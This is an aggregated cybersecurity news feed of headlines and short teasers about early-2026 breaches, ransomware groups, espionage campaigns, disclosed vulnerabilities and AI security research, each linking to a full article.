As cyber threats increase, so does the number of compliance frameworks. Here is how CISOs can handle this challenge. The requirements of cybersecurity regulations can vary depending on company size, region, industry, data sensitivity and ...
Read Full Article →
Four new vulnerabilities found in Ingress NGINX
Four security vulnerabilities have been found in the open source Ingress NGINX traffic controller that is extensively used by organizations in Kubernetes deployments. They can only be fixed by upgrading to the latest version. Of the four holes, two are more serious, because they carry CVSS scores...
Read Full Article →
New APT group breached gov and critical infrastructure orgs in 37 countries
A new cyberespionage group that operates out of Asia has compromised 70 government and critical infrastructure organizations across 37 countries over the past year using a sophisticated toolset that combines phishing, exploitation kits, custom malware, Linux rootkits, web shells, and a variety of...
Read Full Article →
Substack Breach: 662,752 User Records Leaked on Cybercrime Forum
Substack confirms a breach after hacker accessed internal user records now circulating on crime forums, exposing emails, phone numbers, and account metadata.
Read Full Article →
Substack data breach leaks users’ email addresses and phone numbers
Substack, a high-profile publishing platform widely used by academics, journalists, subject matter experts, and controversialists, has suffered a data breach affecting an unknown number of its creators and subscribers. According to emails sent out this week to some users, on February 3 the compan...
Read Full Article → *(Covered by: CSO Online, TechCrunch Security)*
Ransomware gang uses ISPsystem VMs for stealthy payload delivery
Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider. [...]
Read Full Article →
Hacker claims theft of data from 700,000 Substack users; Company confirms breach
Substack confirmed a data breach after a hacker leaked data from nearly 700,000 users, including email addresses and phone numbers. Substack is an online platform for publishing email‑based newsletters and blogs, with built‑in paid subscriptions and basic analytics. It’s free to start; creators p...
Read Full Article → *(Covered by: Security Affairs)*
Incognito Market admin sentenced to 30 years for running $105 million dark web drug empire
A dark web drug bazaar operator
Read Full Article →
One of Europe’s largest universities knocked offline for days after cyberattack
An alleged ransomware attack has taken down the systems of the Sapienza University of Rome.
Read Full Article →
Bulletproof hosting providers renting cheap infrastructure to supply virtual machines to ransomware hackers
Most high-profile ransomware groups were using the same Russian-based infrastructure for years
Read Full Article →
Threat Group Running Espionage Operations Against Dozens of Governments
Unit 42 researchers say an Asian threat group behind what they call the Shadow Campaigns has targeted government agencies in 37 countries in a wide-ranging global cyberespionage campaign that has involved phishing attacks and the exploitation of more than a dozen known vulnerabilities. The post...
Read Full Article →
AISURU/Kimwolf Botnet Launches Record-Setting 31.4 Tbps DDoS Attack
The distributed denial-of-service (DDoS) botnet known as AISURU/Kimwolf has been attributed to a record-setting attack that peaked at 31.4 Terabits per second (Tbps) and lasted only 35 seconds. Cloudflare, which automatically detected and mitigated the activity, said it's part of a growing number...
Read Full Article →
CVE-2025-6978: Arbitrary Code Execution in the Arista NG Firewall
In this excerpt of a TrendAI Research Services vulnerability report, Jonathan Lein and Simon Humbert of the TrendAI Research team detail a recently patched command injection vulnerability in the Arista NG Firewall. This bug was originally discovered by Gereon Huppertz and reported through the Tren
Read Full Article →
Alleged 764 member arrested, charged with CSAM possession in New York
Authorities have arrested multiple members of 764 during the past year, reflecting heightened law enforcement activity targeting the violent extremist collective. The post Alleged 764 member arrested, charged with CSAM possession in New York appeared first on CyberScoop.
Read Full Article →
Startups, listen up: Proton says you're not "too small" to be hacked
Proton's latest report shatters the myth that hackers only target big banks, urging European startups to "build in private" before it's too late.
Read Full Article →
Top 10 web hacking techniques of 2025
Welcome to the Top 10 Web Hacking Techniques of 2025, the 19th edition of our annual community-powered effort to identify the most innovative, must-read web security research published in the last year.
Read Full Article →
Data breach at govtech giant Conduent balloons, affecting millions more Americans
The ransomware attack at Conduent allowed hackers to steal a "significant number of individuals’ personal information" from the govtech giant's systems. Conduent handles personal and health data of more than 100 million people across America.
Read Full Article →
Personal data stolen during Harvard and UPenn data breaches leaked online - over a million details, including emails, home addresses and more, all published
Negotiations were unsuccessful, so ShinyHunters decided to leak everything.
Read Full Article →
Attackers exploit decade‑old Windows driver flaw to shut down modern EDR defenses
In a recent incident, attackers abused a legitimate but vulnerable Windows kernel driver to shut down endpoint security tools during an ongoing incident response. According to a Huntress report, the activity was observed during a customer investigation in early 2026 and involved the use of an old...
Read Full Article →
Backdoor in Notepad++
Hackers associated with the Chinese government used a Trojaned version of Notepad++ to deliver malware to selected users. Notepad++ said that officials with the unnamed provider hosting the update infrastructure consulted with incident responders and found that it remained compromised until Septe...
Read Full Article →
Ransomware attack on Buhlmann Group
The Buhlmann Group has been attacked by a ransomware gang. Its headquarters in Germany, however, was spared. Akira is among the most dangerous ransomware groups and is known for numerous attacks on German companies. Now it has apparently hit the Bremen-based steel...
Read Full Article →
Why boards should be obsessed with their most ‘boring’ systems
Following a series of high-profile cyberattacks, boards of directors are now requiring their organizations to take greater responsibility for the risks posed by enterprise resource planning (ERP) systems. The Jaguar Land Rover (JLR) incident in Se...
Read Full Article →
The silent security gap in enterprise AI adoption
Most security leaders believe they know where their sensitive data lives and how it is protected. That confidence is increasingly misplaced. As enterprises deploy AI across customer support, software development, legal analysis and internal operations, a new data exposure surface has quietly emer...
Read Full Article →
Infy Hackers Resume Operations with New C2 Servers After Iran Internet Blackout Ends
The elusive Iranian threat group known as Infy (aka Prince of Persia) has evolved its tactics as part of efforts to hide its tracks, even as it readied new command-and-control (C2) infrastructure coinciding with the end of the widespread internet blackout the regime imposed at the start of Januar...
Read Full Article →
Microsoft develops a new scanner to detect hidden backdoors in LLMs
Microsoft has developed a scanner designed to detect backdoors in open-weight AI models, addressing a critical blind spot for enterprises increasingly dependent on third-party LLMs. In a blog post, the company said its research focused on identifying hidden triggers and malicious behaviors embed...
Read Full Article →
OpenAI Explains URL-Based Data Exfiltration Mitigations in New Paper
"Last week I saw this paper from OpenAI called “Preventing URL-Based Data Exfiltration in Language-Model Agents”, which goes into detail on new …"
Read Full Article →
Protests Don't Impede Iranian Spying on Expats, Syrians, Israelis
Iranian threat actors have been stealing credentials from people of interest across the Middle East, using spear-phishing and social engineering.
Read Full Article →
Critical n8n Flaw CVE-2026-25049 Enables System Command Execution via Malicious Workflows
A new, critical security vulnerability has been disclosed in the n8n workflow automation platform that, if successfully exploited, could result in the execution of arbitrary system commands. The flaw, tracked as CVE-2026-25049 (CVSS score: 9.4), is the result of inadequate sanitization that bypas...
Read Full Article →
Malicious NGINX Configurations Enable Large-Scale Web Traffic Hijacking Campaign
Cybersecurity researchers have disclosed details of an active web traffic hijacking campaign that has targeted NGINX installations and management panels like Baota (BT) in an attempt to route it through the attacker's infrastructure. Datadog Security Labs said it observed threat actors associated...
Read Full Article →
Srsly Risky Biz: Google's cyber disruption unit kicks its first goal
Tom Uren and Amberleigh Jack talk about Google’s cyber disruption unit taking aim at the IPIDEA residential proxy network. The network was a cybercrime enabler that was used by hundreds of threat actors for crime and espionage. More of this kind of disruption please. They also discuss SpaceX’s ra...
Read Full Article →
Pickling the Mailbox: A Deep Dive into CVE-2025-20393
TL;DR In December 2025, Cisco published https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4 addressing CVE-2025-20393, a critical vulnerability (CVSS 10.0) affecting Cisco Secure Email Gateway and Secure Email and Web Manager. The advisory was n...
Read Full Article →
Ransomware Gang Goes Full 'Godfather' With Cartel
DragonForce is taking cues from organized crime, emphasizing cooperation and coordination among ransomware gangs.
Read Full Article →
CISA Makes Unpublicized Ransomware Updates to KEV Catalog
A third of the "flipped" CVEs affected network edge devices, leading one researcher to conclude, "Ransomware operators are building playbooks around your perimeter."
Read Full Article →
News alert: MomentProof brings cryptographic proof to insurance claims as AI manipulation rises
WASHINGTON, Feb. 4, 2026, CyberNewswire — MomentProofShow us, Inc., a provider of AI-resilient digital asset certification and verification technology, today announced the successful deployment of MomentProof Enterprise for AXA, enabling cryptographically authentic, tamper-proof digital assets fo...
Read Full Article →
Massive Chinese data breach allegedly spills 8.7 billion records - here's what we know
Someone kept a gigantic database unlocked on the internet, allowing researchers (and likely, hackers, too) to find it.
Read Full Article →
More than 40,000 WordPress sites affected by new malware flaw - find out if you're affected
A popular WordPress quiz plugin can be abused to mount SQL injection attacks, but a patch is available.
Read Full Article →
Hackers publish personal information stolen during Harvard, UPenn data breaches
The prolific cybercrime group ShinyHunters took responsibility for hacking Harvard and the University of Pennsylvania, and published the stolen data on its extortion website.
Read Full Article →
Microsoft Develops Scanner to Detect Backdoors in Open-Weight Large Language Models
Microsoft on Wednesday said it built a lightweight scanner that it said can detect backdoors in open-weight large language models (LLMs) and improve the overall trust in artificial intelligence (AI) systems. The tech giant's AI Security team said the scanner leverages three observable signals tha...
Read Full Article →
DEAD#VAX Malware Campaign Deploys AsyncRAT via IPFS-Hosted VHD Phishing Files
Threat hunters have disclosed details of a new, stealthy malware campaign dubbed DEAD#VAX that employs a mix of "disciplined tradecraft and clever abuse of legitimate system features" to bypass traditional detection mechanisms and deploy a remote access trojan (RAT) known as AsyncRAT. "The attack...
Read Full Article →
Global SystemBC Botnet Found Active Across 10,000 Infected Systems
SystemBC malware linked to 10,000 infected IPs, posing risks to sensitive government infrastructure
Read Full Article →
New Technical Markers Reveal Expanding ShadowSyndicate Cybercriminal Infrastructure
ShadowSyndicate cluster expands with new SSH fingerprints connecting servers to other ransomware ops
Read Full Article →
China-Linked Amaranth-Dragon Exploits WinRAR Flaw in Espionage Campaigns
Threat actors affiliated with China have been attributed to a fresh set of cyber espionage campaigns targeting government and law enforcement agencies across Southeast Asia throughout 2025. Check Point Research is tracking the previously undocumented activity cluster under the moniker Amaranth-Dr...
Read Full Article →
AI Drives Doubling of Phishing Attacks in a Year
Cofense claims AI is making phishing emails more personalized and sophisticated
Read Full Article →
Amaranth-Dragon: Weaponizing CVE-2025-8088 for Targeted Espionage in Southeast Asia
Check Point Research has identified several campaigns targeting multiple countries in the Southeast Asian region. These related activities have been collectively categorized under the codename “Amaranth-Dragon”. The campaigns demonstrate a clear focus on government entitie...
Read Full Article →
Big Breach or Smooth Sailing? Mexican Gov't Faces Leak Allegations
A hacktivist group claims a 2.3-terabyte data breach exposes the information of 36 million Mexicans, but no sensitive accounts are at risk, says government.
Read Full Article →
The First 90 Seconds: How Early Decisions Shape Incident Response Investigations
Many incident response failures do not come from a lack of tools, intelligence, or technical skills. They come from what happens immediately after detection, when pressure is high, and information is incomplete. I have seen IR teams recover from sophisticated intrusions with limited telemetry. I ...
Read Full Article →
CISA Adds Actively Exploited SolarWinds Web Help Desk RCE to KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting SolarWinds Web Help Desk (WHD) to its Known Exploited Vulnerabilities (KEV) catalog, flagging it as actively exploited in attacks. The vulnerability, tracked as CVE-2025-40551 (CVS...
Read Full Article →
Risky Business #823 -- Humans impersonate clawdbots impersonating humans
Patrick Gray and Adam Boileau are joined by the newest guy on the Risky Business Media team, James Wilson. They discuss the week’s cybersecurity news, including: the Notepad++ update supply chain attack has been attributed to China; the AI agent future is even more stupid than expected; behold the Ope...
Read Full Article →
Weekly Update 489
This week I'm in Hong Kong, and the day after recording, I gave the talk shown in the image above at INTERPOL's Cybercrime Expert Group. I posted a little about this on Facebook and LinkedIn, but thought I'd expand on what really stuck with
Read Full Article → *(Covered by: Troy Hunt Blog)*
Risky Bulletin: Plone CMS stops supply-chain attack
The Plone CMS stops a supply-chain attack, French cops raid the X Paris office; the number of malicious OpenClaw skills grows, and a Chinese APT hacked Notepad++ servers.
Read Full Article →
Cantwell claims telecoms blocked release of Salt Typhoon report
Senator Maria Cantwell, D-Wash., wants hearings to force AT&T and Verizon to disclose how they’ve responded to the hacks to protect telecom networks. The post Cantwell claims telecoms blocked release of Salt Typhoon report appeared first on CyberScoop.
Read Full Article →
What’s next for DHS’s forthcoming replacement critical infrastructure protection panel, AI information sharing
Nick Andersen, a top CISA official, discussed plans for improving CIPAC and developing an AI-ISAC. The post What’s next for DHS’s forthcoming replacement critical infrastructure protection panel, AI information sharing appeared first on CyberScoop.
Read Full Article →
Ivanti’s EPMM is under active attack, thanks to two critical zero-days
Limited attacks occurred prior to Ivanti’s disclosure, followed by mass exploitation by multiple threat groups. More than 1,400 potentially vulnerable instances remain exposed. The post Ivanti’s EPMM is under active attack, thanks to two critical zero-days appeared first on CyberScoop.
Read Full Article →
Docker Fixes Critical Ask Gordon AI Flaw Allowing Code Execution via Image Metadata
Cybersecurity researchers have disclosed details of a now-patched security flaw impacting Ask Gordon, an artificial intelligence (AI) assistant built into Docker Desktop and the Docker Command-Line Interface (CLI), that could be exploited to execute code and exfiltrate sensitive data. The critica...
Read Full Article →
SQL Injection Flaw Affects 40,000 WordPress Sites
40,000 WordPress sites are vulnerable to SQL injection in Quiz and Survey Master plugin
Read Full Article →
Panera Bread data breach much more serious than we thought - over 5 million customers were hit, new reports claim
Panera Bread customer data leaked on the dark web, allowing researchers to determine how many people were hit.
Read Full Article →
Hackers Exploit Metro4Shell RCE Flaw in React Native CLI npm Package
Threat actors have been observed exploiting a critical security flaw impacting the Metro Development Server in the popular "@react-native-community/cli" npm package. Cybersecurity company VulnCheck said it first observed exploitation of CVE-2025-11953 (aka Metro4Shell) on December 21, 2025. With ...
Read Full Article →
Researchers Warn of New “Vect” RaaS Variant
A new ransomware-as-a-service operation dubbed “Vect” features custom malware
Read Full Article →
Cybercrime Unit of Paris Prosecutors Raid Elon Musk’s X Offices in France
Elon Musk and X’s former CEO were summoned for voluntary interviews in Paris on April 20, 2026
Read Full Article →
Introducing Detectify Internal Scanning for internal scanning behind the firewall
TL;DR We’re launching Internal Scanning, bringing our proprietary security engines, research-led crawling and fuzzing engine for internal vulnerability scanning behind your firewall. Built by Detectify’s ... The post Introducing Detectify Internal Scanning for internal scanning behind the firewal...
Read Full Article →
New Password-Stealing Phishing Campaign Targets Corporate Dropbox Credentials
Multi-stage attack begins with fake message relating to business requests and evades detection with link hidden in a PDF
Read Full Article →
APT28 Uses Microsoft Office CVE-2026-21509 in Espionage-Focused Malware Attacks
The Russia-linked state-sponsored threat actor known as APT28 (aka UAC-0001) has been attributed to attacks exploiting a newly disclosed security flaw in Microsoft Office as part of a campaign codenamed Operation Neusploit. Zscaler ThreatLabz said it observed the hacking group weaponizing the sho...
Read Full Article →
How Mercari strengthened mobile security for millions of users with Oversecured
Discover how Mercari, Japan's largest marketplace app, transformed their mobile security program with Oversecured, uncovering critical vulnerabilities missed by previous tools and achieving reliable automated scanning at scale.
Read Full Article →
Mozilla Adds One-Click Option to Disable Generative AI Features in Firefox
Mozilla on Monday announced a new controls section in its Firefox desktop browser settings that allows users to completely turn off generative artificial intelligence (GenAI) features. "It provides a single place to block current and future generative AI features in Firefox," Ajit Varma, head of ...
Read Full Article →
Notepad++ Hosting Breach Attributed to China-Linked Lotus Blossom Hacking Group
A China-linked threat actor known as Lotus Blossom has been attributed with medium confidence to the recently discovered compromise of the infrastructure hosting Notepad++. The attack enabled the state-sponsored hacking group to deliver a previously undocumented backdoor codenamed Chrysalis to us...
Read Full Article →
As feds pull back, states look inward for election security support
Secretaries of State are scrambling to replace cybersecurity services once provided by CISA and other federal agencies. The post As feds pull back, states look inward for election security support appeared first on CyberScoop.
Read Full Article →
Auditing Outline. Firsthand lessons from comparing manual testing and AI security platforms
Attackers Harvest Dropbox Logins Via Fake PDF Lures
A malware-free phishing campaign targets corporate inboxes and asks employees to view "request orders," ultimately leading to Dropbox credential theft.
Read Full Article →
China-based espionage group compromised Notepad++ for six months
The Chinese APT group Lotus Blossom intruded into the tool’s internal systems to snoop on a limited set of users’ activities, according to researchers. The post China-based espionage group compromised Notepad++ for six months appeared first on CyberScoop.
Read Full Article →
'The breadth of targeted cloud platforms continues to expand': Google's security team takes a look at how ShinyHunters have rolled out so many SSO scams recently
▼
Mandiant analyzed ShinyHunters' MO, detailing how it steals login and MFA codes.
Read Full Article →
Canada Computers & Electronics reveals data breach - customer data exposed, here's what we know
▼
Some customers see credit card information also exposed, with police already notified.
Read Full Article →
Russian ransomware hackers allegedly hit Tulsa airport in cyberattack, dump private files online as proof
▼
The infamous Qilin group strikes again, this time targeting a major US airport.
Read Full Article →
OpenClaw Bug Enables One-Click Remote Code Execution via Malicious Link
▼
A high-severity security flaw has been disclosed in OpenClaw (formerly referred to as Clawdbot and Moltbot) that could allow remote code execution (RCE) through a crafted malicious link. The issue, which is tracked as CVE-2026-25253 (CVSS score: 8.8), has been addressed in version 2026.1.29 relea...
Read Full Article →
Please Don’t Feed the Scattered Lapsus ShinyHunters
▼
A prolific data ransom gang that calls itself Scattered Lapsus ShinyHunters (SLSH) has a distinctive playbook when it seeks to extort payment from victim firms: Harassing, threatening and even swatting executives and their families, all while notifying journalists and regulators… Read More »
Read Full Article →
ShinyHunters Expands Scope of SaaS Extortion Attacks
▼
Following their attacks on Salesforce instances last year, members of the cybercrime group have broadened their targeting and gotten more aggressive with extortion tactics.
Read Full Article →
NSA Publishes New Zero Trust Implementation Guidelines
▼
NSA released new guidelines to help organizations achieve target-level Zero Trust maturity
Read Full Article →
MongoDB instances are being hit in data extortion attacks, so make sure you're protected
▼
Hackers are hunting for vulnerable MongoDB servers and there are reportedly many to choose from.
Read Full Article →
Notepad++ Update Hijacking Linked to Hosting Provider Compromise
▼
A supply chain attack on Notepad++ update process was linked to compromised hosting infrastructure
Read Full Article →
Major health provider data breach may have affected thousands more people - over 700k now thought to have been hit
▼
TriZetto Provider Solutions breach was spotted in October 2025 after hackers lurked for almost a year.
Read Full Article →
⚡ Weekly Recap: Proxy Botnet, Office Zero-Day, MongoDB Ransoms, AI Hijacks & New Threats
▼
Every week brings new discoveries, attacks, and defenses that shape the state of cybersecurity. Some threats are stopped quickly, while others go unseen until they cause real damage. Sometimes a single update, exploit, or mistake changes how we think about risk and protection. Every incident show...
Read Full Article →
Android RAT Uses Hugging Face to Host Malware
▼
Bitdefender has discovered a new Android malware campaign that uses Hugging Face
Read Full Article →
Open VSX Supply Chain Attack Used Compromised Dev Account to Spread GlassWorm
▼
Cybersecurity researchers have disclosed details of a supply chain attack targeting the Open VSX Registry in which unidentified threat actors compromised a legitimate developer's resources to push malicious updates to downstream users. "On January 30, 2026, four established Open VSX extensions pu...
Read Full Article →
Beyond ACLs: Mapping Windows Privilege Escalation Paths with BloodHound
▼
Beyond ACLs: Mapping Windows Privilege Escalation Paths with
Read Full Article →
Iran-Linked RedKitten Cyber Campaign Targets Human Rights NGOs and Activists
▼
A Farsi-speaking threat actor aligned with Iranian state interests is suspected to be behind a new campaign targeting non-governmental organizations and individuals involved in documenting recent human rights abuses. The activity, observed by HarfangLab in January 2026, has been codenamed RedKitt...
Read Full Article →
FBI takes notorious RAMP ransomware forum offline
▼
The FBI has seized control of RAMP, a notorious cybercrime online forum that bragged to be the only place that allowed ransomware, and boasted over 14,000 active users. Now some of those users' details are likely to be in the hands of the police... Read more in my article on the Bitdefender blog.
Read Full Article →
Mandiant Finds ShinyHunters-Style Vishing Attacks Stealing MFA to Breach SaaS Platforms
Google-owned Mandiant on Friday said it identified an "expansion in threat activity" that uses tradecraft consistent with extortion-themed attacks orchestrated by a financially motivated hacking group known as ShinyHunters. The attacks leverage advanced voice phishing (aka vishing) and bogus cred...
Tenable Tackles AI Governance, Shadow AI Risks, Data Exposure
The Tenable One AI Exposure add-on discovers unsanctioned AI use in the organization and enforces policy compliance with approved tools.
This dangerous North Korean malware has now split into three entities for maximum impact
Labyrinth Chollima is morphing into three separate entities engaged in cyber-espionage and crypto theft against firms in the West.
Someone Knows Bash Far Too Well, And We Love It (Ivanti EPMM Pre-Auth RCEs CVE-2026-1281 & CVE-2026-1340)
When Ivanti removed the embargoes from CVE-2026-1281 and CVE-2026-1340 - pre-auth Remote Command Execution vulnerabilities in Ivanti’s Endpoint Manager Mobile (EPMM) solution - we sighed with relief. Clearly, the universe had decided to continue mocking Secure-By-Design signers right on schedule ...
Labyrinth Chollima Evolves into Three North Korean Hacking Groups
CrowdStrike assessed that two new threat actor groups have spun off from the North Korean Labyrinth Chollima hackers.
AIs Are Getting Better at Finding and Exploiting Security Vulnerabilities
From an Anthropic blog post: In a recent evaluation of AI models’ cyber capabilities, current Claude models can now succeed at multistage attacks on networks with dozens of hosts using only standard, open-source tools, instead of the custom tools needed by previous generations. This illustrates ...
Polish Grid Systems Targeted in Cyberattack Had Little Security, Per New Report
The hackers behind a cyberattack that targeted Poland's grid infrastructure met little resistance when they hit systems at a heat-and-power plant and wind and solar farms last month. The intruders were able to easily access numerous systems at the affected facilities because the systems were conf...
China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware
Cybersecurity researchers have discovered a new campaign attributed to a China-linked threat actor known as UAT-8099 that took place between late 2025 and early 2026. The activity, discovered by Cisco Talos, has targeted vulnerable Internet Information Services (IIS) servers located across Asia, ...
New AI-Developed Malware Campaign Targets Iranian Protests
The RedKitten campaign distributes lures designed to target people seeking information about missing persons or political dissidents in Iran.
Badges, Bytes and Blackmail
Behind the scenes of law enforcement in cyber: what do we know about caught cybercriminals? What brought them in, where do they come from and what was their function in the crimescape? Introduction: One view on the scattered fight against cybercrime The growing sophistication and diversification ...
SmarterMail Fixes Critical Unauthenticated RCE Flaw with CVSS 9.3 Score
SmarterTools has addressed two more security flaws in SmarterMail email software, including one critical security flaw that could result in arbitrary code execution. The vulnerability, tracked as CVE-2026-24423, carries a CVSS score of 9.3 out of 10.0. "SmarterTools SmarterMail versions prior to ...
Two Ivanti EPMM Zero-Day RCE Flaws Actively Exploited, Security Updates Released
Ivanti has rolled out security updates to address two security flaws impacting Ivanti Endpoint Manager Mobile (EPMM) that have been exploited in zero-day attacks, one of which has been added by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its Known Exploited Vulnerabilities...
Chinese APTs Hacking Asian Orgs With High-End Malware
Advanced persistent threat (APT) groups have deployed new cyber weapons against a variety of targets, highlighting the increasing threats to the region.
Risky Bulletin: eScan antivirus distributes backdoor in latest supply chain attack
Hackers breach eScan antivirus and distribute a backdoor, Google takes down the IPIDEA proxy botnet, most GDPR fines remain uncollected, and the Poland wiper attack hit 30 locations.
MY TAKE: Transparent vs. opaque — edit Claude’s personalized memory, or trust ChatGPT’s blindly?
After two years of daily ChatGPT use, I recently started experimenting with Claude, Anthropic’s competing AI assistant. Related: Microsofts see a ‘protopian’ AI future Claude is four to five times slower generating responses. But something emerged that matters more than … (more…) The post MY TAKE...
Fintech firm Marquis blames hack at firewall provider SonicWall for its data breach
The fintech giant said it plans to "seek recoupment of any expenses" from its firewall provider SonicWall after a 2025 data breach exposed customer firewall configurations.
Google Disrupts Extensive Residential Proxy Networks
Google has taken coordinated action against the massive IPIDEA residential proxy network, enhancing customer protections and disrupting cybercrime operations.
France Fines National Employment Agency €5m Over 2024 Data Breach
The French data protection regulator said that France Travail’s response to a 2024 data breach violated GDPR.
FBI Takes Down RAMP Ransomware Forum
The dark web forum administrator confirmed the takedown and said they had “no plans to rebuild”.
Ransomware Victim Numbers Rise, Despite Drop in Active Extortion Groups
Ransomware victims surged in Q4 2025 despite fewer active extortion groups, with data leaks rising 50%, ReliaQuest researchers report.
Smashing Security podcast #452: The dark web’s worst assassins, and Pegasus in the dock
In episode 452, a London-based YouTuber wins a landmark court case against Saudi Arabia after his phone was hacked with Pegasus spyware — exposing how a single, seemingly harmless text message can turn a smartphone into a round-the-clock surveillance device. Plus, we go looking for professional h...
How Can CISOs Respond to Ransomware Getting More Violent?
Ransomware defense requires focusing on business resilience. This means patching issues promptly, improving user education, and deploying multifactor authentication.
AI security startup Outtake raises $40M from Iconiq, Satya Nadella, Bill Ackman, and other big names
Outtake makes an agentic cybersecurity platform to help enterprises detect identity fraud. Its angel investors read like a who's who of tech industry names.
Cyber Security Report 2026
Check Point's flagship report delivers industry-leading intelligence shaping the decisions security leaders will make in 2026.
Critical and High Severity n8n Sandbox Flaws Allow RCE
Two critical security flaws in n8n have exposed sandboxing vulnerabilities, enabling remote code execution for attackers.
Emojis in PureRAT’s Code Point to AI-Generated Malware Campaign
Researchers discover that PureRAT’s code now contains emojis, indicating it has been written by AI based on comments ripped from social media.
AI Security Threats Loom as Enterprise Usage Jumps 91%
Zscaler analysts found critical vulnerabilities in 100% of enterprise AI systems, with 90% compromised in under 90 minutes.
Vibe-Coded 'Sicarii' Ransomware Can't Be Decrypted
A new ransomware strain that entered the scene last year has poorly designed code and uses Hebrew language that might be a false flag.
General Graboids: Worms and Remote Code Execution in Command & Conquer
[this work was conducted collaboratively by Bryan Alexander and Jordan Whitehead] This post details several vulnerabilities discovered in the popular online game Command & Conquer: Generals. We recently presented some of this work at an information security conference and this post contain
'Stanley' Toolkit Turns Chrome Into Undetectable Phishing Vector
The malware-as-a-service kit enables malicious extensions to overlay pages on real websites without changing the visible URL, signaling a fresh challenge for enterprise security.
Pyodide Sandbox Escape Enables Remote Code Execution in Grist-Core
Critical sandbox escape vulnerability in Grist-Core enables remote code execution via a malicious formula.
World Leaks Ransomware Group Claims 1.4TB Nike Data Breach
Nike is investigating after the World Leaks ransomware group posted a 1.4TB data dump.
Sandworm Blamed for Wiper Attack on Polish Power Grid
Researchers attributed the failed attempt to the infamous Russian APT Sandworm, which is notorious for wiper attacks on critical infrastructure organizations.
Who Operates the Badbox 2.0 Botnet?
The cybercriminals in control of Kimwolf -- a disruptive botnet that has infected more than 2 million devices -- recently shared a screenshot indicating they'd compromised the control panel for Badbox 2.0, a vast China-based botnet powered by malicious software that comes pre-installed on many An...
Law Firm Investigates Coupang Security Failures Ahead of Class Action Deadline
The US law firm Hagens Berman will lead a class action lawsuit against Coupang over security failures that led to a June 2025 data breach.
Okta Flags Customized, Reactive Vishing Attacks Which Bypass MFA
Threat actors posing as IT support teams use phishing kits to generate fake login sites in real time to trick victims into handing over credentials.
Wiper Attack on Polish Power Grid Linked to Russia’s Sandworm
A destructive cyber attack targeting Poland’s energy sector has been linked to Russian APT group Sandworm.
Cyberattack Targeting Poland’s Energy Grid Used a Wiper
A cyberattack that targeted power plants and other energy producers in Poland at the end of December used malware known as a “wiper” that was intended to erase computers as part of an operation intended to cause a power outage and other disruption to services, says European security
Under Armour Investigates Data Breach After 72 Million Records Allegedly Exposed
Under Armour said there is no evidence at this point to suggest the incident affected systems used to process payments or store customer passwords.
News Alert: Halo Security earns SOC 2 Type II certification, shows sustained operational security
MIAMI, Jan. 22, 2026, CyberNewswire — Halo Security, a leading provider of external attack surface management and penetration testing services, today announced it has successfully achieved SOC 2 Type II compliance following an extensive multi-month audit by Insight Assurance.… (more…) The post N...
Critical Appsmith Flaw Enables Account Takeovers
Critical vulnerability in Appsmith allows account takeover via a flawed password reset process.
KONNI Adopts AI to Generate PowerShell Backdoors
North Korea-linked threat group KONNI targets countries across APAC, specifically in blockchain sectors, with AI-generated malware.
LastPass Warns of Phishing Campaign Attempting to Steal Master Passwords
Phoney email alerts suggest users need to back up their LastPass accounts within 24 hours. LastPass says it would never require this action from users.
Over 160,000 Companies Notify Regulators of GDPR Breaches
DLA Piper finds a 22% increase in breached firms notifying European GDPR regulators.
Attackers With Decompilers Strike Again (SmarterTools SmarterMail WT-2026-0001 Auth Bypass)
Well, well, well - look what we’re back with. You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV holders. The plot of that story had everything; * A g...
Python Wheel (Zip) Parser Differential Vulnerability v2.0
Summary: It is still possible (albeit with significantly more effort) to upload a specially crafted Wheel file (i.e. zip) to PyPI that when installed with PIP (or another Python zipfile based t...
Phishing and Spoofed Sites Remain Primary Entry Points For Olympics
Cyber risks for the Milano-Cortina 2026 Winter Games include phishing and spoofed websites as key threat vectors.
Peruvian Loan Scam Harvests Cards and PINs via Fake Applications
A loan phishing operation in Peru is stealing card information by impersonating financial institutions.
SHARED INTEL Q&A: AI retrieval systems can still hallucinate; deterministic logic offers a fix
AI hallucination is still the deal-breaker. Related: Correcting LLM hallucinations As companies rush AI into production, executives face a basic constraint: you cannot automate a workflow if you cannot trust the output. A model that fabricates facts becomes a risk … (more…) The post SHARED INTEL ...
Risk of AI Model Collapse to Drive Zero Trust Data Governance, Gartner Says
Gartner predicts 50% of organizations will adopt zero trust data governance by 2028.
News alert: Forrester study finds Airlock Digital’s app control cuts breaches to zero with 224% ROI
ATLANTA, Jan. 20, 2026, CyberNewswire — Airlock Digital, a leader in proactive application control and endpoint security, announced the release of The Total Economic Impact (TEI) of Airlock Digital, an independent study commissioned by Airlock Digital and conducted … (more…) The post News alert...
News alert: One Identity launches AI-powered ‘Identity Manager’ to speed threat response
ALISO VIEJO, Calif., Jan. 20, 2026, CyberNewswire — One Identity, a trusted leader in identity security, today announces a major upgrade to One Identity Manager, a top-rated IGA solution, strengthening identity governance as a critical security control for … (more…) The post News alert: One Ide...
AI-supported vulnerability triage with the GitHub Security Lab Taskflow Agent
Learn how we are using the newly released GitHub Security Lab Taskflow Agent to triage categories of vulnerabilities in GitHub Actions and JavaScript projects.
Kimwolf Botnet Lurking in Corporate, Govt. Networks
A new Internet-of-Things botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic. Kimwolf's ability to scan the local networks of comp...
Prompt Injection Bugs Found in Official Anthropic Git MCP Server
Three vulnerabilities in Anthropic's Git server for the MCP can be exploited via prompt injection.
LinkedIn Phishing Campaign Exploits Open-Source Pen Testing Tool to Compromise Business Execs
Cybersecurity researchers at ReliaQuest warn of an ongoing campaign delivered to “high-value individuals” via LinkedIn messages.
Why inaccessible cybersecurity is a security risk: our path to accessibility
In cybersecurity, an inaccessible tool isn’t just a nuisance: it’s a vulnerability. With the European Accessibility Act tightening regulations across Sweden and the EU, “good ... The post Why inaccessible cybersecurity is a security risk: our path to accessibility appeared first on Blog Detectify.
AI Supercharges Attacks in Cybercrime's New 'Fifth Wave'
